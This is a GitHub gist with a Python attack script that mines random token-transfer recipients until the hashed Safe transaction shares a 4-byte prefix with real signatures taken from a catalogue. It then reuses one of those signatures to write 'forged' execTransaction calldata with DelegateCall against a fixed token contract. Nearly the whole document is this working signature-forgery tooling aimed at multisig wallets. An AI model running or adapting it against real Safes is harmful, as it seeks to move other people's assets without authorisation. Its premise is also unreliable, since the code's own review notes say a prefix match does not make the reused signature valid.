Created
June 2, 2025 18:41
-
-
Save FoobarProtocol/cb343bf5ebdeec7171fc3287bb912146 to your computer and use it in GitHub Desktop.
This script allows us to find the first 4 bytes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3
"""
safe_prefix_collision_miner.py

Parallel “4-byte-prefix” collision miner for Gnosis Safe’s buggy EIP-191 fallback,
with manual ABI-pack of `execTransaction(...)` calldata (no eth_abi dependency).

Usage:
    python3 safe_prefix_collision_miner.py \
        --catalogue safe_signature_catalogue.csv \
        --nonce 71 \
        --output forged_prefix_calldata.hex \
        --max-iter 2000000 \
        --workers 4

Dependencies:
    pip install eth-utils pycryptodome
"""
import argparse
import csv
import os
import random
import sys
from concurrent.futures import ProcessPoolExecutor, as_completed
from typing import Dict, List, Optional, Set, Tuple

from Crypto.Hash import keccak
from eth_utils import to_bytes, to_checksum_address, to_int
# ─────────────────────────────────────────────────────────────────────────────
# Fixed transaction parameters. Every hash and calldata blob built in this
# module uses these values; only the recipient, nonce and signature vary.

# Type hash placed first in the Safe transaction struct encoding.
SAFE_TX_TYPEHASH = bytes.fromhex(
    "bb8310d486368db6bd6f849402fdd73ad53d316b5a4b2644ad6efe0f941286d8"
)
# Domain separator mixed into the final EIP-712 digest.
# NOTE(review): presumably specific to one Safe deployment/chain — confirm.
DOMAIN_SEPARATOR = bytes.fromhex(
    "b3ded2bdbff5db1a87f6d551fa256e9f2bd6517a3bb84f4c2ea863fb3a559622"
)

# `to` argument of the outer execTransaction call.
TOKEN_CONTRACT_ADDRESS = "0x96221423681a6d52e184d440a8efcebb105c7242"
VALUE = 0
# NOTE(review): in the Safe Operation enum 1 is presumably DelegateCall
# (0 = Call) — confirm this is the intended operation.
OPERATION = 1
SAFE_TX_GAS = 45746
BASE_GAS = 0
GAS_PRICE = 0
GAS_TOKEN = "0x0000000000000000000000000000000000000000"
REFUND_RECEIVER = "0x0000000000000000000000000000000000000000"

# execTransaction selector:
# keccak256("execTransaction(address,uint256,bytes,uint8,uint256,uint256,uint256,address,address,bytes)")[0:4]
EXECUTE_SELECTOR = bytes.fromhex("6a761202")
# ERC-20 transfer(address,uint256) selector. The callers in this module always
# pair it with an amount of 0.
ERC20_TRANSFER_SELECTOR = bytes.fromhex("a9059cbb")

ZERO_32_BYTES = b"\x00" * 32
SEQPREFIX = ZERO_32_BYTES[:12]  # for left-padding 20-byte address to 32 bytes

# Prefix for EIP-191 personal_sign over a 32-byte payload.
ETH_PERSONAL_PREFIX = b"\x19Ethereum Signed Message:\n32"
# ─────────────────────────────────────────────────────────────────────────────
def keccak256(data: bytes) -> bytes:
    """Return the 32-byte Keccak-256 digest of ``data``."""
    hasher = keccak.new(digest_bits=256)
    hasher.update(data)
    return hasher.digest()
def wrap_eip191(msg_hash: bytes) -> bytes:
    """
    Hash ``msg_hash`` under the personal-sign prefix.

    Returns keccak256(ETH_PERSONAL_PREFIX ∥ msg_hash).

    Raises:
        ValueError: if ``msg_hash`` is not 32 bytes. The prefix hard-codes a
            payload length of 32, so any other size would be mislabelled.
    """
    if len(msg_hash) != 32:
        raise ValueError(f"msg_hash must be 32 bytes, got {len(msg_hash)}")
    return keccak256(ETH_PERSONAL_PREFIX + msg_hash)
def build_safe_tx_hash(to_addr: str, data_hash: bytes, nonce: int) -> bytes:
    """
    Hash the Safe transaction struct built from the module-level parameters.

    Computes:
        keccak256(
            SAFE_TX_TYPEHASH ∥ to(32B) ∥ value(32B) ∥ data_hash(32B) ∥ operation(32B) ∥
            safeTxGas(32B) ∥ baseGas(32B) ∥ gasPrice(32B) ∥ gasToken(32B) ∥
            refundReceiver(32B) ∥ nonce(32B)
        )

    Args:
        to_addr: hex address string of the call target.
        data_hash: 32-byte keccak256 of the inner call data.
        nonce: Safe nonce, encoded as a 32-byte big-endian word.

    Returns:
        The 32-byte struct hash.

    Raises:
        ValueError: if ``data_hash`` is not 32 bytes.
    """
    if len(data_hash) != 32:
        raise ValueError(f"data_hash must be 32 bytes, got {len(data_hash)}")
    # Field order follows the layout documented above: `to` comes before
    # `value`. Swapping the two yields a different hash.
    words = (
        SAFE_TX_TYPEHASH,
        abi_encode_address(to_addr),
        abi_encode_uint256(VALUE),
        data_hash,
        abi_encode_uint256(OPERATION),
        abi_encode_uint256(SAFE_TX_GAS),
        abi_encode_uint256(BASE_GAS),
        abi_encode_uint256(GAS_PRICE),
        abi_encode_address(GAS_TOKEN),
        abi_encode_address(REFUND_RECEIVER),
        abi_encode_uint256(nonce),
    )
    return keccak256(b"".join(words))
def build_eip712_hash(safe_tx_hash: bytes) -> bytes:
    """
    Final EIP-712 digest = keccak256(0x19 ∥ 0x01 ∥ domainSeparator ∥ safeTxHash).

    Raises:
        ValueError: if ``safe_tx_hash`` is not 32 bytes.
    """
    if len(safe_tx_hash) != 32:
        raise ValueError(
            f"safe_tx_hash must be 32 bytes, got {len(safe_tx_hash)}"
        )
    return keccak256(b"\x19\x01" + DOMAIN_SEPARATOR + safe_tx_hash)
def abi_encode_uint256(value: int) -> bytes:
    """
    Encode a uint256 as a 32-byte big-endian word.

    Raises:
        OverflowError: if ``value`` is negative or does not fit in 32 bytes.
    """
    return value.to_bytes(32, byteorder="big")
def abi_encode_address(addr: str) -> bytes:
    """
    Encode a hex address string as a 32-byte word by left-padding the
    20-byte address with zeros.

    Args:
        addr: 40 hex digits, with or without a leading '0x'/'0X'.

    Raises:
        ValueError: if ``addr`` is not valid hex or is not exactly 20 bytes.
            Rejecting bad input keeps every encoded slot 32 bytes wide.
    """
    # Strip the prefix only when present, so an unprefixed address does not
    # silently lose its first byte.
    hex_part = addr[2:] if addr[:2] in ("0x", "0X") else addr
    raw = bytes.fromhex(hex_part)
    if len(raw) != 20:
        raise ValueError(f"address must be 20 bytes, got {len(raw)}: {addr!r}")
    return b"\x00" * 12 + raw
def abi_encode_bytes_dynamic(blob: bytes) -> bytes:
    """
    Encode a dynamic `bytes` blob under ABI rules:
        1) 32-byte big-endian length
        2) `blob` itself
        3) zero-pad to a multiple of 32 bytes

    An empty blob encodes to the length word alone.
    """
    size = len(blob)
    # -size % 32 is the distance to the next 32-byte boundary (0 if aligned).
    pad = b"\x00" * (-size % 32)
    return size.to_bytes(32, byteorder="big") + blob + pad
def build_exec_tx_calldata_manual(
    to_addr: str,
    recipient: bytes,
    nonce: int,
    signature_blob: bytes
) -> bytes:
    """
    Manually build the ABI-encoded calldata for:
        execTransaction(
            address to,
            uint256 value,
            bytes data,
            uint8 operation,
            uint256 safeTxGas,
            uint256 baseGas,
            uint256 gasPrice,
            address gasToken,
            address refundReceiver,
            bytes signatures
        )
    without using eth_abi. Layout after the 4-byte selector:
        HEAD (10 slots, each 32 bytes):
            0: to
            1: value
            2: offset_data    → 0x140 (320, the size of the head)
            3: operation
            4: safeTxGas
            5: baseGas
            6: gasPrice
            7: gasToken
            8: refundReceiver
            9: offset_sigs    → 320 + size of the encoded data tail
        TAIL:
            [ data-packed: length(32) ∥ data ∥ pad ]
            [ sigs-packed: length(32) ∥ sig_blob ∥ pad ]

    Args:
        to_addr: hex address string for the `to` slot.
        recipient: 20-byte address placed in the inner transfer call.
        nonce: accepted for interface compatibility; the calldata has no
            nonce slot, so it does not affect the result.
        signature_blob: raw bytes for the `signatures` argument.

    Returns:
        Selector followed by head and tails, as bytes.

    Raises:
        ValueError: if ``recipient`` is not 20 bytes (the padded parameter
            would no longer be a 32-byte word).
    """
    if len(recipient) != 20:
        raise ValueError(f"recipient must be 20 bytes, got {len(recipient)}")

    # Inner call: ERC20_TRANSFER_SELECTOR ∥ pad32(recipient) ∥ uint256(0)
    # → 4 + 32 + 32 = 68 bytes.
    inner_call = (
        ERC20_TRANSFER_SELECTOR + SEQPREFIX + recipient + abi_encode_uint256(0)
    )

    # Tails. The encoded data tail is length word (32) + payload padded to 96
    # = 128 bytes for the 68-byte inner call.
    data_packed = abi_encode_bytes_dynamic(inner_call)
    sig_packed = abi_encode_bytes_dynamic(signature_blob)

    # Offsets are measured from the start of the head (just after the
    # selector). The signatures tail starts after the whole data tail,
    # length word included: 320 + 128 = 448 = 0x1c0 for this payload.
    head_size = 32 * 10
    offset_data = head_size
    offset_sigs = head_size + len(data_packed)

    head_words = (
        abi_encode_address(to_addr),
        abi_encode_uint256(VALUE),
        abi_encode_uint256(offset_data),
        abi_encode_uint256(OPERATION),
        abi_encode_uint256(SAFE_TX_GAS),
        abi_encode_uint256(BASE_GAS),
        abi_encode_uint256(GAS_PRICE),
        abi_encode_address(GAS_TOKEN),
        abi_encode_address(REFUND_RECEIVER),
        abi_encode_uint256(offset_sigs),
    )
    return EXECUTE_SELECTOR + b"".join(head_words) + data_packed + sig_packed
def load_catalogue(csv_path: str) -> List[Dict]:
    """
    Load the signature catalogue CSV with columns:
        proxy, tx, r, s, v, h712, h191

    The r, s, h712 and h191 values are whitespace-stripped and v is converted
    to int; any other columns are passed through unchanged.

    Args:
        csv_path: path to the CSV file (must have a header row).

    Returns:
        One dict per data row, in file order. An empty file yields [].

    Raises:
        ValueError: if a column this loader reads is missing from the header,
            a row is shorter than the header, or v is not an integer.
    """
    text_fields = ("r", "s", "h712", "h191")
    catalogue: List[Dict] = []
    with open(csv_path, newline="", encoding="utf-8") as f:
        reader = csv.DictReader(f)
        header = reader.fieldnames
        if header is None:
            # Completely empty file: nothing to load.
            return catalogue
        missing = [col for col in text_fields + ("v",) if col not in header]
        if missing:
            raise ValueError(
                f"{csv_path}: missing column(s): {', '.join(missing)}"
            )
        for row in reader:
            # DictReader fills absent trailing cells with None; fail with the
            # line number instead of an AttributeError on .strip().
            if any(row[col] is None for col in text_fields + ("v",)):
                raise ValueError(
                    f"{csv_path}: line {reader.line_num} has too few columns"
                )
            for col in text_fields:
                row[col] = row[col].strip()
            row["v"] = int(row["v"])
            catalogue.append(row)
    return catalogue
def build_prefix_map(
    catalogue: List[Dict],
    prefix_len: int = 4
) -> Tuple[Set[bytes], Dict[bytes, List[Dict]]]:
    """
    Index the catalogue by digest prefix.

    Takes the first ``prefix_len`` bytes of every row's h712 and h191 digest
    and builds:
        * the set of all such prefixes, and
        * a map from prefix → list of catalogue rows that share it.

    Args:
        catalogue: rows with hex-string 'h712' and 'h191' entries, with or
            without a leading '0x'.
        prefix_len: number of leading digest bytes to index on (default 4).

    Returns:
        (prefix_set, prefix_map); prefix_set equals the keys of prefix_map.

    Raises:
        ValueError: if ``prefix_len`` is < 1 or a digest is shorter than
            ``prefix_len``, so every stored prefix has the same length.
    """
    if prefix_len < 1:
        raise ValueError(f"prefix_len must be >= 1, got {prefix_len}")

    prefix_map: Dict[bytes, List[Dict]] = {}
    for row in catalogue:
        for field in ("h712", "h191"):
            hex_digest = row[field]
            # Drop the prefix only when it is really there.
            if hex_digest[:2] in ("0x", "0X"):
                hex_digest = hex_digest[2:]
            digest = bytes.fromhex(hex_digest)
            if len(digest) < prefix_len:
                raise ValueError(
                    f"{field} digest shorter than {prefix_len} bytes: "
                    f"{row[field]!r}"
                )
            prefix_map.setdefault(digest[:prefix_len], []).append(row)
    return set(prefix_map), prefix_map
def worker_task(
    prefix_set: Set[bytes],
    prefix_map: Dict[bytes, List[Dict]],
    seed: int,
    chunk_size: int,
    to_address: str,
    nonce: int
) -> Optional[Dict]:
    """
    Run up to ``chunk_size`` trials of random 160-bit recipients.

    For each candidate the inner call data is hashed, turned into the Safe
    transaction hash, the EIP-712 digest and finally the EIP-191 wrapped
    digest. If the leading bytes of that wrapped digest are in ``prefix_set``,
    the search stops and returns:
        { 'prefix': bytes,
          'recipient': bytes(20),
          'wrap_digest': bytes(32),
          'matches': List[Dict] }   # prefix_map[prefix]
    Otherwise returns None.

    The compared prefix length is taken from ``prefix_set`` itself (4 bytes
    when built with the default), assuming all its entries share one length.

    NOTE(review): a hit means only the leading bytes agree; the matched rows'
    digests still differ from ``wrap_digest`` in general.

    Args:
        prefix_set: prefixes to look for.
        prefix_map: prefix → catalogue rows; must contain every prefix in
            ``prefix_set``.
        seed: seed for this worker's private PRNG (runs are reproducible).
        chunk_size: maximum number of candidates to try.
        to_address: hex address string used as the Safe transaction target.
        nonce: Safe nonce mixed into the transaction hash.
    """
    if not prefix_set:
        # Nothing can match; skip the hashing work entirely.
        return None
    prefix_len = len(next(iter(prefix_set)))

    rnd = random.Random(seed)
    zero_amount = (0).to_bytes(32, byteorder="big")  # loop-invariant
    for _ in range(chunk_size):
        candidate = rnd.getrandbits(160).to_bytes(20, byteorder="big")

        # 1) data_full = ERC20_TRANSFER_SELECTOR ∥ pad32(recipient) ∥ 32B(0)
        data_full = ERC20_TRANSFER_SELECTOR + SEQPREFIX + candidate + zero_amount
        data_hash = keccak256(data_full)

        # 2) safeTxHash → EIP-712 message hash
        msg_hash = build_eip712_hash(
            build_safe_tx_hash(to_address, data_hash, nonce)
        )

        # 3) wrap (EIP-191) and compare the leading bytes
        wrap_digest = wrap_eip191(msg_hash)
        pref = wrap_digest[:prefix_len]
        if pref in prefix_set:
            return {
                "prefix": pref,
                "recipient": candidate,
                "wrap_digest": wrap_digest,
                "matches": prefix_map[pref]
            }
    return None
# ───────────────────────────────────────────────────────────────────────────── | |
def main():
    """
    Command-line entry point.

    Parses the arguments, loads the catalogue, fans the search out over a
    process pool and, on the first hit, prints the match and writes the
    hex-encoded calldata to the --output file. Prints a message and returns
    normally if no worker finds a match.
    """
    parser = argparse.ArgumentParser(
        description=(
            "Parallel 4-byte prefix collision miner for Safe’s buggy EIP-191 fallback."
        )
    )
    parser.add_argument(
        "--catalogue", required=True,
        help="Path to safe_signature_catalogue.csv"
    )
    parser.add_argument(
        "--nonce", type=int, required=True,
        help="Safe nonce (decimal, e.g. 71)"
    )
    parser.add_argument(
        "--output", required=True,
        help="Write forged calldata (hex) to this file"
    )
    parser.add_argument(
        "--max-iter", type=int, default=1_000_000,
        help="Total number of random attempts across all workers"
    )
    parser.add_argument(
        "--workers", type=int, default=os.cpu_count(),
        help="Number of parallel processes"
    )
    args = parser.parse_args()
    if args.max_iter < 0:
        parser.error("--max-iter must be non-negative")

    catalogue = load_catalogue(args.catalogue)
    prefix_set, prefix_map = build_prefix_map(catalogue, prefix_len=4)
    print(f"Loaded {len(catalogue)} signatures; {len(prefix_set)} distinct 4-byte prefixes.")

    to_address = to_checksum_address(TOKEN_CONTRACT_ADDRESS)
    total_iters = args.max_iter
    # os.cpu_count() may return None, which would make max(1, None) raise.
    workers = max(1, args.workers if args.workers is not None else 1)

    # Hand the division remainder to the first workers so that exactly
    # total_iters trials are scheduled.
    chunk, extra = divmod(total_iters, workers)
    chunk_sizes = [chunk + (1 if i < extra else 0) for i in range(workers)]
    print(f"Running {total_iters:,} trials across {workers} processes (~{chunk:,} each).")

    with ProcessPoolExecutor(max_workers=workers) as executor:
        futures = []
        for size in chunk_sizes:
            if size == 0:
                continue
            seed = random.randrange(2**32)
            futures.append(
                executor.submit(
                    worker_task,
                    prefix_set,
                    prefix_map,
                    seed,
                    size,
                    to_address,
                    args.nonce
                )
            )

        for fut in as_completed(futures):
            res = fut.result()
            if res is None:
                continue

            # A worker found a prefix match. cancel() only stops futures that
            # have not started yet; chunks already running finish before the
            # `with` block exits.
            for f in futures:
                f.cancel()

            pref = res["prefix"]
            recipient = res["recipient"]
            wrap_digest = res["wrap_digest"]
            matches = res["matches"]

            print(f"\n=== Found 4-byte prefix collision! ===")
            print(f"Prefix (4 bytes): 0x{pref.hex()}")
            print(f"Recipient : 0x{recipient.hex()}")
            print(f"Full wrap digest : 0x{wrap_digest.hex()}\n")
            print("Matching catalogue entries (first shown):")
            chosen = matches[0]
            print(f" Proxy: {chosen['proxy']}")
            print(f" TX : {chosen['tx']}")
            print(f" v : {chosen['v']}")
            print(f" r : {chosen['r']}")
            print(f" s : {chosen['s']}\n")

            # NOTE(review): this signature comes from a row whose digest
            # shares only a prefix with wrap_digest; nothing here checks that
            # it verifies against the new digest — confirm before relying on
            # the output.
            chosen_r = bytes.fromhex(chosen["r"][2:])
            chosen_s = bytes.fromhex(chosen["s"][2:])
            chosen_v = chosen["v"]
            sig_blob = chosen_r + chosen_s + chosen_v.to_bytes(1, byteorder="big")

            calldata = build_exec_tx_calldata_manual(to_address, recipient, args.nonce, sig_blob)
            hexout = "0x" + calldata.hex()
            with open(args.output, "w", encoding="ascii") as of:
                of.write(hexout)
            print(f"Forged calldata written to {args.output}")
            return

    print(f"No 4-byte prefix collision found in {total_iters:,} attempts.")
# Run the CLI only when executed as a script. The guard also keeps worker
# processes that re-import this module from re-running main().
if __name__ == "__main__":
    main()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment